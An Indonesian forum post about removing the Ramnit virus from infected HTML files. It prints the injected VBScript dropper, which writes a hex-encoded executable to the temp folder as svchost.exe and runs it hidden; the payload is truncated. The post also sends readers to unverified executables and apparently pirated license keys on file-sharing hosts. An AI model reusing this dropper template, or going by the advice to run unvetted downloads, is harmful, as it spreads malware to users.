[Virus]Mengatasi Virus Ramnit HTML Encrypted

 sumber dari agan omrapid

"Akhirnya setelah perjuangan siang dan malam....
om tau ini virus disusupi dari blog/files2 html juga bisa melalui flash disk penyebarannya dan email.
Bahayanya ini virus bisa beranak cucu kayak orang!!
anti virus yang udah ditest smadav dan artav tak sanggup mengatasinya...
klo pake kav dan avira waktu di scann, apunnn DJJJJJJ, ada seribu sampe dua ribu lebih file htm/html terinfeksi, plus file exe dan dll, bahkan script2 yang dicoding ikut terdeteksi, waktu saya klik "clean all" sialan lagi......siallll banget, file nya kehapus dan masuk folder quarantine, mati dah!!"

PHP Code:

<SCRIPT language="VBScript"><! -- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000 // Kodenya terlalu panjang disini
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0 //
--> 

setelah browsing untuk mencari solusi, ( karena antivirus kaga bisa nolong malah nambahin masalah cz menghapus file-file penting ) saya menemukan file ini
VBSDropperRemover.exe
kalo broken link cari aja di sini atau nunggu saya bisa aplot ndiri dah.....
aplikasi itu saya coba untuk membersihkan file yang terinfeksi tanpa menghapus file asli dan bener, berhasil, tapi ada syaratnya

Aplication support : Windows XP/Vista/2000
Java must be supported for Windows XP/Vista/2000/windows 7
Ram dan disk space sistem menyesuaikan aja lah terserah asal jangan make floppy buat sistemnya

1 Install Java terlebih dahulu
atau ga mau pusink langsung ke tkp

Code:

http://4share.me/kdmg84
http://maxspeedy.com/b10iwfm07m86/Java_InstallerV6.24.exe.html

dan download file penghancur virus disini

Code:

http://4share.me/h6n5rb
http://maxspeedy.com/t88u5oibqvek/vbs_dropper_remover.exe.html

2 Download file dan extract ke direktori mana aja deh yang ente suka

3 Jalankan file nya


Point 1 klik Choose root dir untuk memilih drive yang terinfeksi
point 2 klik start untuk memulai pembersihan
point 3 tunggu beberapa saat
point 4 pada bagian cleaned akan muncul report "FATAL! Virus found.

PHP Code:

file C:WINDOWSsystem32oobesetupsecurity.htm is not infected. file C:WINDOWSsystem32oobesetuptimezone.htm is not infected. file C:WINDOWSsystem32oobesetupusername.htm is not infected. file C:WINDOWSsystem32oobesetupwelcome.htm is not infected. file C:WINDOWSsystem32oobeupdshell.htm is not infected. file C:WINDOWSWebtip.htm is not infected. 

Bagan diatas menandakan system html /htm sudah bersih tidak ada virus

Kalo munculnya kayak gitu berarti file htm/html berhasil di bersihkan tanpa menghapusnya, yang di remove cuman kode VBS nya saja kok
point 5 pada bagian failed itu adalah report gagal, saya ndak tau tulisanya gimana, karena saya berhasil membersihkan seluruh isi flasdisk saya, so, semoga ente gagal n mau bagi info ya seperti apa tulisan report di bagian failed

5 mulai hancurkan semua kode VBS yang menginfeksi seluruh komputer anda

6 perlu di ingat, yang dibersihkan hanya file berekstensi htm dan html jika file nya exe, kata si pemilik aplikasi sih antivirus tetaplah yang utama.

7. Klo teman2 kaskus ada yang ingin memberikan masukan dan tambahan silahkan di share bersama agar komputer kita aman terus browse dan download

8. Jangan lupa abis bersihkan semua download dan install ini anti virus buat bersihkan sampe ke sourcenya/sumbernya :

Code:

http://4share.me/wziyc6

pake juga ini avira download

Code:

http://4share.me/ub1nak

Lisensi keynya disini gan

Code:

http://4share.me/vibgbt

Credits buat agan
w3d0z\\

~Makasih buat KASKUSER atas thread yang bermutu dan berguna~